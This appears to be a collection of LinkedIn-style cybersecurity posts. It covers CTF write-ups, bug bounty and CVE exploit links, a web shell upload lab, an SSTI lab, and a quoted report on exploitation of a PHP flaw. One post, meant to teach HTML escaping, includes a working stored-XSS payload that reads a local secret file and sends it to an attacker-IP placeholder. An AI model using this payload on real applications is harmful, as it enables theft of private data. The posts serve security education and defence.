Daniel Dias’ Post

🚀 New CTF Write-Up: HackMyVM - Texte 🚀 Excited to share my latest Capture The Flag (CTF) write-up on the HackMyVM - Texte challenge! This challenge involved web exploitation techniques and privilege escalation to secure root access. 🛡️ Here’s a quick summary of the steps I followed: 1. Ran Nmap to identify open ports. 2. Visited the web page for vulnerabilities. 3. Exploited a file upload vulnerability. 4. Retrieved the user password from a hidden page. 5. Obtained the user flag. 6. Checked for SETUID capable binaries. 7. Inspected the binary for clues. 8. Executed the binary to gain a root shell. 9. Retrieved the root flag. Learning Outcomes: - Improved skills in web exploitation and binary analysis for privilege escalation. 🔗 Blog: https://buff.ly/40mMgFe If you're keen on cybersecurity and CTF challenges, I hope this write-up inspires your own exploration! #CyberSecurity #CTF #HackMyVM #WebExploitation #PrivilegeEscalation #InfoSec #Nmap

Hello fellow hackers, I'm excited to share my recent bug bounty writeup on how I chained an HTML Injection to a critical SSRF. I hope this writeup can be a valuable resource for anyone. You can find the write-up linked below https://lnkd.in/dasnw_4n

Exploit for CVE-2024-8504 & CVE-2024-8503: SQLi and RCE https://lnkd.in/edFxSw6r #exploit #exploitation #cve #vulnerability #cybersecurity #informationsecurity

New Blog Alert! The final blog of the file upload vulnerability series (part 3b-II) is out now. In this blog I have explained in detail about by-passing black lists using obfuscation of file extensions. Further there is a step-by-step solution for the Web Security Academy lab, "Lab: Web shell upload via obfuscated file extension". https://lnkd.in/gu5iVH5S #Portswigger #WebSecurityAcademy #CyberSecurity #InfoSec #WebSecurity #MediumBlogging

I created a tool called CNAME Sniffer! It’s designed to identify subdomains with vulnerable CNAME records that can be exploited for takeover. This tool helps you secure your digital assets and stay ahead of potential threats. Excited to share it with the community! #Cybersecurity #Infosec #SubdomainTakeover GitHub Bugcrowd HackerOne Integrity YesWeHack

Hi everyone, hacked this lab which contains a Server Side Template Injection (SSTI) vulnerability. This web application uses 'Handlebars' template engine in Node JS which is vulnerable to a popular exploit : https://lnkd.in/gWjwKmUW that leads to Remote Code Execution (RCE). Using this exploit a hacker can remotely control and execute arbitrary command on the server. #hacking #penetrationtesting #pentesting #websecurity #nodejs #cybersecurity

Let me stress again how important HTML escaping is in order to protect against XSS. If your application has XSS vulnerability, nothing is safe, including OAuth tokens stored into Local/Session storage or in memory. Consider the scenario where application provides local access to some secret document, i.e. only for client IPs originating from the same host or network. The attacker can still steal the document if the application has XSS vulnerability through user supplied, persisted comments reviewed (by admin) using browser on the server machine. There is no need for script tag, image tag will do the job. Short story: Start server on the attacker's machine: python -m http.server Supply user comment in the target vulnerable application: <img src="non-existing-image.png" onerror="fetch('hxxp[://]127[.]0[.]0[.]1:8080/secret.txt').then(response=>response.text().then(txt=>fetch('http://<ATTACKER_IP>:8000?text='+txt)));" /> Note*: Fang defanged URL above in CyberChef The attacker's server will receive the exfiltrated secret document content. Double check and review your applications if they escape all user supplied information, including user names! #cybersecurity #ctf

https://lnkd.in/djseph-n "CVE-2024-4577 is a flaw that allows an attacker to escape the command line and pass arguments to be interpreted directly by PHP. The vulnerability itself lies in how Unicode characters are converted into ASCII. " "we observed exploit attempts targeting this PHP flaw on our honeypot network within 24 hours of its disclosure. One such attempt involved Gh0st RAT malware (Figure 5), which is an open-source remote access tool that has been around for more than 15 years." "there was one exploit blocked by Adaptive Security Engine that was not detected by our honeypots. In the payload seen in Figure 12, an attacker was attempting to copy a file from a server they controlled to the root directory of the target server. The copied file “up.txt” would allow the attacker to upload any additional files by using the “/xl.php” endpoint. The threat actor could use this to upload other malicious files, such as web shells or malware. Most important, by creating another way to upload files, the attacker could maintain access even after the patch for CVE-2024-4577 has been applied. " #malware #ghostrat #redtail #muhstik #xmrig #exploit #php

First writeup about CTFs that I write in my blog 😁 its about the CTF HackingStation, the machine I uploaded to VulNyx a few days ago. Enjoy it! https://lnkd.in/dfVGTVSc #vulnyx #ctf #cybersecurity #security #informationsecurity #infosec #pentest #pentesting #cybersec #websecurity #privesc #hacking #ethicalhacking #networksecurity #vulnerabilities #securityawareness #writeup #ctfwriteup